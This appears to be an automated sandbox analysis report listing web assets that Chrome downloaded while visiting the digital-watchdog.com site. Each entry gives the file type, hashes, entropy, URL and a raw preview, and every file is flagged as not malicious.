                                                                                                                                                                                    Preview:.PNG........IHDR...s...........fY....gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (546), with CRLF line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):7452
                                                                                                                                                                                    Entropy (8bit):5.486531472130933
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:527129111341DBC960C928589F981F23
                                                                                                                                                                                    SHA1:EDA3936B385C2EAE0017D64DB6BFF335FC1ADC54
                                                                                                                                                                                    SHA-256:7D91DDD451BF48BF13AD87067D917142EBD388BA46F5EB8665ABF71DFE01C679
                                                                                                                                                                                    SHA-512:A5A7A11D1A6C66BB932C469A7398B683FEB1CF887642ED65D5573164C18E7025DDF5373F557CC6D5FEF8FA8CA79C5750FB22A3A0312FF80ADAEEC69021311ED9
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://digital-watchdog.com/js/xdate.js
                                                                                                                                                                                    Preview:/*.. XDate v0.8.. Docs & Licensing: http://arshaw.com/xdate/..*/..var XDate=function(g,n,A,p){function f(){var a=this instanceof f?this:new f,c=arguments,b=c.length,d;typeof c[b-1]=="boolean"&&(d=c[--b],c=q(c,0,b));if(b)if(b==1)if(b=c[0],b instanceof g||typeof b=="number")a[0]=new g(+b);else if(b instanceof f){var c=a,h=new g(+b[0]);if(l(b))h.toString=v;c[0]=h}else{if(typeof b=="string"){a[0]=new g(0);a:{for(var c=b,b=d||!1,h=f.parsers,w=0,e;w<h.length;w++)if(e=h[w](c,b,a)){a=e;break a}a[0]=new g(c)}}}else a[0]=new g(m.apply(g,c)),d||(a[0]=r(a[0]));else a[0]=new g;..typeof d=="boolean"&&B(a,d);return a}function l(a){return a[0].toString===v}function B(a,c,b){if(c){if(!l(a))b&&(a[0]=new g(m(a[0].getFullYear(),a[0].getMonth(),a[0].getDate(),a[0].getHours(),a[0].getMinutes(),a[0].getSeconds(),a[0].getMilliseconds()))),a[0].toString=v}else l(a)&&(a[0]=b?r(a[0]):new g(+a[0]));return a}function C(a,c,b,d,h){var e=k(j,a[0],h),a=k(D,a[0],h),h=!1;d.length==2&&typeof d[1]=="boolean"&&(h=d[1],d=[
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=676, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=883], baseline, precision 8, 883x676, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):456863
                                                                                                                                                                                    Entropy (8bit):7.947459494003642
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:7883DBC1998265F0DC22E80E95010BFC
                                                                                                                                                                                    SHA1:56B07C1279341CD3B5FF8A1BD0549BBFA540C374
                                                                                                                                                                                    SHA-256:7C654E36FB327EBB71B680C1C25C36DC2A67579D1963C6D6D1759F24EF43A168
                                                                                                                                                                                    SHA-512:0CB9657C63915971D9C5E61B25717F9060906E065E3EF25A4244ACE61928589D5C2270E61B5DF6B290A6D6DE159E2265749C536DE0DD929CFEF18A92DAB39513
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:......Exif..MM.*...............s.......................................................................................(...........1...........2..........i............. ............'.......'.Adobe Photoshop 22.0 (Windows).2022:07:06 21:48:48............0231.......................s...........................................n...........v.(.....................~...................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................z...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....~.\.n..u.+&......_.....U...i,0Aw.c.xw.g.q.F.n.......m.sZw.[.u[.[...E..\..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 7443
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):495
                                                                                                                                                                                    Entropy (8bit):7.5095498743698395
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:B2B7478DE2E5A57B29A992E015E41B42
                                                                                                                                                                                    SHA1:60F7EB9FCF28F65D723B192555FB19908628B383
                                                                                                                                                                                    SHA-256:A83119B6F240AA92172554FA2D74CA48E85A4E9330CF4D61EA8FAA705E81F8CB
                                                                                                                                                                                    SHA-512:67C4B8EE3352E2BAE4FFF60B439623331E167A34BB3A7F40925BABF9E6EAFC65A32ED019ED22F9BCA61E1C7A42C89CC378C800E3FE36EA1E4ED7C6118EDBB9B0
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:"https://fonts.googleapis.com/css?family=DM+Sans:100,200,300,400,600,500,700,800,900|DM+Sans:100,200,300,400,500,600,700,800,900&subset=latin"
                                                                                                                                                                                    Preview:...........Mo.0.............^.v.M.MS'..(!H|t@.F...l.N;M...O...._.....u6V-,.Gp.V..];.C...e..iMU_b.........#.x....].d...*.c.......18...q....!5i..(..7y..=4...=.....Gz9?.x.........}...;..?...x....sw8.ky.<..ZOu}..=.U.=....R~...,..b.&oU.).....P.f.^.....4!....N..$\nLx:M"{U..)...SL...C.HM.0=B.7%....N..b..B.~...e.(...D.+J..8.N.B....Tq|...P.+g.cE.....H...S.3"&5.9`r.O.!)....XB...C..@9u...:v...(..<"[....,..3....C..@9u....:v...(..<".S..u....Gd..C..@9u....:v.....Y._........*......
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):22875
                                                                                                                                                                                    Entropy (8bit):7.98905445580201
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:FD7A2C0AAF3F016199C8D93ED03352ED
                                                                                                                                                                                    SHA1:5A25F8D3BB8908318FB6F4AC16DE9AC083EF716B
                                                                                                                                                                                    SHA-256:455DEC53673106AB06EE6AB48A183E971D5955836F5F941267D643A046DD7C17
                                                                                                                                                                                    SHA-512:E35EF304F52D65EAE838D55764117FDC341267857B048FA3E5C3841167F075685288CC8237001E091AA2C679AEA4A25A227FC0FD1FDF04F822165C36E6F2EC69
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.bundle.min.js
                                                                                                                                                                                    Preview:[*3.......8..:...t..../..Q.pY.a..r.....d#q."t=.T....B]Nb,...T..o... ..4f...d..\P... ..T@..4.(.......)....R....}d.Pf..w.)).f.f..5I*..X.n.Ih....s6.(...U?'*"...].P......$.S.:...3k.?...`.y...[...L^..43.A...............6o.......@.E.....X...n..PH x.W.d2~.M.;......[Y..?..Yo.x.........v..?,........t.).z..[Y.>....(.gY...&.........vv.>....".s..{.?..E$..]5....@m..\.a..7.......+&...... V...........M...:Uu...y7.2...t....>"..(...[nw.kY..U~$Z....z.xiM!j.\....x-..M.._..]M.h.......fS..&../k&.[t.p.&,...j...0B.a.o.... .&|j.....x..lxw.k....4....@.Sz.....%....%..9d@...-.....k....T.....\.....r.H%K...}.L.....y..g.~.....g...f.j......."...)u.aej.......]Z....ku....C...9.\;.5.....0Z4S&....dh...8.R.9F.......#.F(...0.~..x...sj32=.Myb.7..A..s.\...@....fJo...J..q.m).M.i.......b.$A.,.M8.9..=..]].f...r..[.F=...2<..6..f..vN.O..-5C..(k....lh_..X-}.WR.b.;;.;.Z.VOeD...z..zi.7.h.....g...b.]Ob.k.n..8...d.r,.....*s...+..SS.!w..C...K.-..c.r.`.d.@...D6...f.!V..v'...`...i..c...~yN!..m
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=12, height=1788, bps=158, PhotometricIntepretation=RGB, orientation=upper-left, width=2710], progressive, precision 8, 2710x1788, components 3
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):998980
                                                                                                                                                                                    Entropy (8bit):7.977732730875214
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:9BB41A6C49632060C19F6BDA23509D2B
                                                                                                                                                                                    SHA1:DD848F35DEE4F91B4F34C9CF41A49A7A1BC9C84B
                                                                                                                                                                                    SHA-256:7D95F09BD0B76F66871BB92A228499AA547B6D8E600275250E3FE9E602DB7476
                                                                                                                                                                                    SHA-512:22E1B75D4C76C5940053499CA968C5144ABB8B14100E70D856F7C72BB1BFBD260B30AAFA19E2BAAE8CA2719EFF1B4F46D3AF5717D17EDB63E5F4FA2960EBCF63
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://dmq883log67hn.cloudfront.net/assets/_medialibrary/20220614101054dp2142766226.jpg
                                                                                                                                                                                    Preview:......Exif..II*.......................................................................................................(...........1...........2...........i........... ..............'.......'..Adobe Photoshop 22.0 (Windows).2022:07:12 16:36:32............0231................................................................n...........v...(...................~...................H.......H.............Adobe_CM......Adobe.d.................................................................................................................................................j...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...Q.3.O..3....o...~`...D.4W...=..!.[.....3.Kb..`....vO...X.wj...Z.HOb(..Q.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:gzip compressed data, from Unix, original size modulo 2^32 70105
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):14147
                                                                                                                                                                                    Entropy (8bit):7.9831320023833054
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:17AF80F6398F5DB22BD07F27625CD446
                                                                                                                                                                                    SHA1:7A2A99DE1B0D0813034FF4F0D1236D08E8D5F734
                                                                                                                                                                                    SHA-256:FB0E478CDDEF87088EBD9DAD89E2B79D675AC2F570597E632F46A23D4F06C70B
                                                                                                                                                                                    SHA-512:0112AB2AC03991C5D4A6B377AEE44C17C4B45F49881D87E4D2B0C445262AF76EECB33727D55D0161F81E2DD190751072CB492753D86B51299D40FA82ACE43717
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://connect.facebook.net/signals/config/767361503973632?v=2.9.203&r=stable&domain=digital-watchdog.com&hme=36c7454c4b078660353e5d4c89e3eaca439a56e5c3ceaadddff6c79ae427835a&ex_m=74%2C128%2C113%2C117%2C65%2C6%2C106%2C73%2C19%2C101%2C93%2C55%2C58%2C183%2C204%2C211%2C207%2C208%2C210%2C32%2C107%2C57%2C81%2C209%2C178%2C181%2C205%2C206%2C191%2C140%2C45%2C196%2C193%2C194%2C37%2C152%2C18%2C54%2C200%2C199%2C142%2C21%2C44%2C2%2C47%2C69%2C70%2C71%2C75%2C97%2C20%2C17%2C100%2C96%2C95%2C114%2C56%2C116%2C42%2C115%2C33%2C98%2C43%2C90%2C29%2C179%2C182%2C149%2C14%2C15%2C16%2C8%2C9%2C28%2C25%2C26%2C61%2C66%2C68%2C79%2C105%2C108%2C30%2C80%2C12%2C10%2C84%2C52%2C24%2C110%2C109%2C111%2C102%2C13%2C23%2C4%2C41%2C78%2C22%2C161%2C136%2C77%2C1%2C99%2C60%2C88%2C36%2C31%2C86%2C87%2C92%2C40%2C7%2C94%2C85%2C48%2C35%2C38%2C0%2C72%2C118%2C91%2C5%2C51%2C50%2C89%2C248%2C176%2C126%2C164%2C157%2C3%2C39%2C67%2C46%2C112%2C49%2C83%2C64%2C63%2C34%2C103%2C62%2C59%2C53%2C82%2C76%2C27%2C104%2C11%2C119
                                                                                                                                                                                    Preview:...........}.w.....+h.w..1..Y..,.....[-.y=...H..,..IJ.+.....\%.....=......`6.x..g.~..F|0L..F......a.b.'X9.6..`...o.J...Q4V.D4e.....W0Qh.!..u..".'.Q....s...&1.2......p.a%.n...>w#.........$f..g....X...wo.B}Gqx.D.$LI.<V..Mn.S.+q0.l... R,...Vq.h......A9;.}f'<.....d..f)0.n.Xt.:..J..S.0G.n.U.sm...o.1$C.(.O. ......J.......`".........+..bv.kQi.,m@9.<n...L...$4^.p.yA.Xw.....E(........7...n3%.R.S,.6.7..r_.D;.9.a-..'.O8..0.`.b%p..a..x.V.....[.m..U..O........U:].+.;..O?\(.[......C.u..{...+..>;ow.........Q.}.........;e..rrz..u.;.....Tt.6.iw.........Ek.s...+....v...3...\i)g.......r.....VZ'....I...s.}.>...rr...l.\(....#.Y......t...g..w..P......^[9..........V..+....;..rz.}...#....I0...u.../:.'0........V.N./...;.6VZ..,....1V`YO..H.D...-.E.......m..9h..:'.0.ra..g/~../.F...6v.lJ#.....0.....dz.e..eA.P..MWg...Mh....,.x........75I.2..m-4nASA...8..vwW...hfi3*...p..t.N.^0........?3OiGQ...EC.......G.~.P.c.b.Q...U._"sH.L.c...L...$...5...].h.....zDf.I.o...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):22116
                                                                                                                                                                                    Entropy (8bit):4.846345639322247
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:FEE0EBB8739D6485F9503B37C445FFDB
                                                                                                                                                                                    SHA1:1C676D540B2D3447EC07AE4102C1B59562606798
                                                                                                                                                                                    SHA-256:ADE48218AC91AE5025225F3C43B44BF6F455A1A2BAEE767B8E44E7E2EC58E455
                                                                                                                                                                                    SHA-512:8E0527D35ABEA7C01CF762D615D48B6642D92DF3F2DA0970B2290B2C0EACC64917F161B877AE3CC0F5DED916C5412E8436338006CAAE6A219F0C216197D599D6
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://digital-watchdog.com/css/new-homepage.css
                                                                                                                                                                                    Preview:/* @font-face {.. font-family: 'Gotham';.. src: url('/fonts/Gotham Thin.otf') format('opentype');.. font-weight: 200;.. font-style: normal;..}..@font-face {.. font-family: 'Gotham';.. src: url('/fonts/Gotham Book.otf') format('opentype');.. font-weight: 300;.. font-style: normal;..}..@font-face {.. font-family: 'Gotham';.. src: url('/fonts/Gotham-Medium.otf') format('opentype');.. font-weight: 400;.. font-style: normal;..}..@font-face {.. font-family: 'Gotham';.. src: url('/fonts/Gotham Bold.otf') format('opentype');.. font-weight: 600;.. font-style: normal;..}..@font-face {.. font-family: 'Gotham';.. src: url('/fonts/Gotham-Black.otf') format('opentype');.. font-weight: 900;.. font-style: normal;..} */....body {.. /* font-family: 'Gotham'; */.. line-height: 1.2 !important;..}.....header-navbar-space {.. /* font-family: 'Gotham'; */.. background: #141414 !important;.. line-height: 1.2 !important;..}.....pp-tit
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):24847
                                                                                                                                                                                    Entropy (8bit):5.192882382649743
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:DFC274BF160E8F7423EBEB1B246AA997
                                                                                                                                                                                    SHA1:C063573CCF4CAEFD75467E7FEC6FEFD9C5775FB0
                                                                                                                                                                                    SHA-256:63AF3EAA8CA52E93340037FC498FC61F8764FD85D3A9E3A805FE3CE226B7E507
                                                                                                                                                                                    SHA-512:07E39B928564BB1B6B563D217DFBFF4606EDB6A8E20217B117E7D9E8392C6957C0D64E08F7980495617B12421009BA203E10AA3132A267DE36EC76A2DF8AA304
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://digital-watchdog.com/js/script.js?20250530073516
                                                                                                                                                                                    Preview:// Scroll.js....$(window).on('popstate',function(e){...e.preventDefault();...var target = window.location.href.split("#")[1];...if(target != "" && target!=undefined && document.getElementById(target)!=null){....$('html, body').stop().animate({'scrollTop': $("#"+target).offset().top}, 500, 'swing', function () {.....window.location.hash = target;....});...}..});......$.fn.digits = function(){.. return this.each(function(){.. $(this).text( $(this).text().replace(/(\d)(?=(\d\d\d)+(?!\d))/g, "$1,") );.. $(this).val( $(this).val().replace(/(\d)(?=(\d\d\d)+(?!\d))/g, "$1,") );.. })..}......$(document).ready(function() {...SF_scripts();..});....function SF_scripts(){.....$(window).resize(function(){....resizeVideo();....showMenuBtn();...});.....$(window).trigger("resize");.....// open hamburger...$('.hamburger').click(function(event){....if($(this).hasClass('opened')){.....$(this).removeClass('opened');....}else{.....$(this).addClass('opened');....}...});.....// open menu on mobile...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):951
                                                                                                                                                                                    Entropy (8bit):7.777713906383996
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:0B39C78C7F195761501A5CAC48AB76BF
                                                                                                                                                                                    SHA1:9C22FC78ADD6AA781D5E18D021EF860B58529410
                                                                                                                                                                                    SHA-256:82E8E242B06C6EB4FE4134E61AA5E7EA2EC07D0490C661B8BACEFE0E165E794E
                                                                                                                                                                                    SHA-512:03EE85B4F46EE40AD7982627AE47A6FEDCC48C251F51C09486841952E9476B7B523CF34913DA1B0E1A2D51019BDBE24E2B55105DC86A1C0B362A286999F39CB0
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE
                                                                                                                                                                                    Preview:........}9Q.e.T..u.[.%n_~.H.....a....SE......r.[..K..@i<....+.:..-._.^.|.".'..]|F.U#..cj...].v....j."..s...X.mW.K#..c.0jt.(e0.+...8.......F..j..8\.jo...Q]..16&....9...rbtyU.[#7.c]..:..e...].de\..+.u.. Ss#Nm....p....D1.ZO..{&.z..IQ4g........m...-.v..E1...=9_....L..).i..j...._/.4..d.K.. C..-.Z^u.......?......E...I*..v..m.gb...P..^8.R...E......0.....;F.W.'..R..dI.N7W....ve.H...\H..fs.L. 6.l....k..."...R1..L....c|..r..'6/....&......d..G"...$..?...mm..j...tA.Az.XF>...{..E.<...;U~...bps.. ..CyrWk.??......sg.a.U ......dRJ......t...%p.!../Q.\c..1S....e.%.^.&D?...?. ...".f.8. .Z.a.H...a....LeD..\.@.y.<yT..<.t\.'.Oh0S.kNV.4..2.i.f......w...u..\p.dj..G...fs![O{gA...w...^...iQ....S.(.8+..R...r..5d....;e.....H...aq.......G3.7....^#.....O.kd..0_..z.,....?Q..E..|.'.5..../.D.F.......".`.....Y....7..u...^.9..Y.............'d<........V'i..-1.&&....x..<..G`...<..f.i/...."k....(.#.S...k.......E..,..a......7..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=12, height=634, bps=158, PhotometricIntepretation=RGB, orientation=upper-left, width=2694], baseline, precision 8, 1513x634, components 3
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):409400
                                                                                                                                                                                    Entropy (8bit):7.7898222562674055
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:57B19FA24021E4623CB8E2CA2E880D8C
                                                                                                                                                                                    SHA1:D8C4B3FF61F31BCE42692946B6DF93D87E612063
                                                                                                                                                                                    SHA-256:E3F81B03D0D7B91E9A25C6225DEB71082DC37CEE2D1E5755C0E7DE88BF20212D
                                                                                                                                                                                    SHA-512:23DCFCB7451B988B4333049DCEE046B549BAE72010DBD70D2BBE867E9887019D07AF95E0FCCD1EE99D4C4AFBC32D47E100E1AEB21D6608A7CE3F017188DF8DE9
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://dmq883log67hn.cloudfront.net/assets/_medialibrary/20220616061510dp1783973937.jpg
                                                                                                                                                                                    Preview:......Exif..II*...........................z...........................................................................(...........1...!.......2...........i...........$..............'.......'..Adobe Photoshop 23.1 (Macintosh).2022:06:17 08:25:58..............0231................................z...............................r...........z...(.......................................H.......H.............Adobe_CM......Adobe.d.................................................................................................................................................C...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....z.R.5\.m.4....}![^...[.....z..l\..V.M..kS..C.....cY....e..N..d...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):23149
                                                                                                                                                                                    Entropy (8bit):7.990523996800028
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:F81B7C23E95F2BDC48B31CE46EDDE74A
                                                                                                                                                                                    SHA1:AC48A6265E921D4F6276C3662B16EDE63C98A6B5
                                                                                                                                                                                    SHA-256:841E6474EE66C2BB49B7861A751F0BB7C7EC085BDC816902AFF7CF9C52AD84ED
                                                                                                                                                                                    SHA-512:83BABD72BDB56195DA86E4B2EDBF539A7C29985E0EF308B8AB1F02408E7693301F7C5BB1F2C3B56CFB1E2230AFD0216D403A5664ED45FE5E858E6D6D61314F02
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js
                                                                                                                                                                                    Preview:....../..../.'..ZK...$...ir..i....$.u:....@............?.j..L.L. E..5)YU..E......).......O.!.G.@.I....9.J..R.#..=.3 i.#j......=.#.......b..$..&EC+..v....Af.$e... e.*e..M.<.O..vS;.....HB...;.g....?..Y.]s..?e.+y-_.4..4.g.LC.R.....U.....\.....H?...E..........r.(....|..S...<.2..Q6...l.S.G...)..>e.e........Z..~..npM2....=...).).&.E..13"!...C.......\$.4....`.m.#.D..q.I.a.9N...q<O...V'. ....I...x....+...;J..D.....t... S0.....v..Ph.$..K.(}t1i...\.g....4Qx.GA2..&.......P....)..Z.tQ...14+.U.......$:.z......vi...36Q...%..U......s.]...PG....... .k.Ix.pSr..*..p......`.....&.$...^]3.g.:_..........Nv.....\v...J.F..y.....-....)3.$...A-..Q.L.sc}..O&&.vu^......wCJ......i.uh..>.\z..d..|.`u_.%...c......V.:/1...?'W3=$.0yo.:.L..3..)y..5....!..t....Y...md...#.....9P}.}...T...|.m.Wh.zG...d.n.P....s.........s.]s...:/.iB..}...z[?.1]...L.X.]s......@...eN.H.N...OE.........cT....(..e.Z.....&.9..9.Qp.Go.i.%X.C..[.../.c7...&..<.N)....o.q;...&<..|.?..fME.CX.x.......dbR...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:PNG image data, 1000 x 1000, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):69629
                                                                                                                                                                                    Entropy (8bit):7.914253036459194
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:4ADD710F038D489FF2D1C445181CF590
                                                                                                                                                                                    SHA1:BA0D9B21A29865848D020BDAA4AAF866EC8A9493
                                                                                                                                                                                    SHA-256:148D611D9376B95DCA1BEA5AABA23161A2C1DA4BC15DEEB4175D0AA75622BE35
                                                                                                                                                                                    SHA-512:1EA3B8A0C588DB96576341FA82D8EF65EEC50B86B418714374FDE70F14DC091A6685E5137C40DF1A1FA70CB5F75E9A1E19E1893574F2B552AD49C10D8209579F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://digital-watchdog.com/product_detail_assets/X_icon.png
                                                                                                                                                                                    Preview:.PNG........IHDR.............M.......pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.1462899, 2023/06/25-20:01:55 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 25.1 (Windows)" xmp:CreateDate="2024-03-29T00:24:41+07:00" xmp:ModifyDate="2024-03-29T00:25:06+07:00" xmp:MetadataDate="2024-03-29T00:25:06+07:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:894fdc0b-06f1-9044-a48d-53eb9202c175" xmpMM:DocumentID="xmp.did:894fdc0b-06f1-9044-a48d-53eb9202c175" xmpMM:OriginalDocumentID="xmp.did:894fdc0b-06f1-9044-a
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:PNG image data, 22 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):208
                                                                                                                                                                                    Entropy (8bit):6.325778677570972
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:910A77378C588721F2F4366B4676EF31
                                                                                                                                                                                    SHA1:22981F8B25A0470006549C06371FA3485C5FAD19
                                                                                                                                                                                    SHA-256:FC59A7E1B6B695DC39ED6E9B170B5C33FF941EE843784C4649C98CEF2D605659
                                                                                                                                                                                    SHA-512:3BB65E9E21D0F2C003B31C38C81432C1605D8C73476DE2B691194ECD99256381583A8034D5BE3DA906B24406EB678C24945EE4FE15A52E8ACE5B858C6040BD92
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:.PNG........IHDR.............+1......IDAT8.c`.............H?..r|I.@...y...1....n._R...@....Y......A........P......MH."I.p...W.N0.+".p..%.p..%.p..%d.,o.z..%.rJ.%.p..%`8e..0.:...)`..Z..@dA.............IEND.B`.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ISO Media, MP4 v2 [ISO 14496-14]
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):262144
                                                                                                                                                                                    Entropy (8bit):7.800081091566049
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:737A66E9316F64C829381650FDD452FF
                                                                                                                                                                                    SHA1:D2414DE91BF3E34033A4047AFB6020021711CD84
                                                                                                                                                                                    SHA-256:9CFE3ABCDCE6B32B00E6336AC16F714779EE6608332B229E8F1E896E6B8E28ED
                                                                                                                                                                                    SHA-512:0E2A8C4724EA81795DDCB597674A65C9330C704830E170C67758845250298E36127076A5435554798A6A3B6956A5A441A812A29D675C647A8722208E91A27C1C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
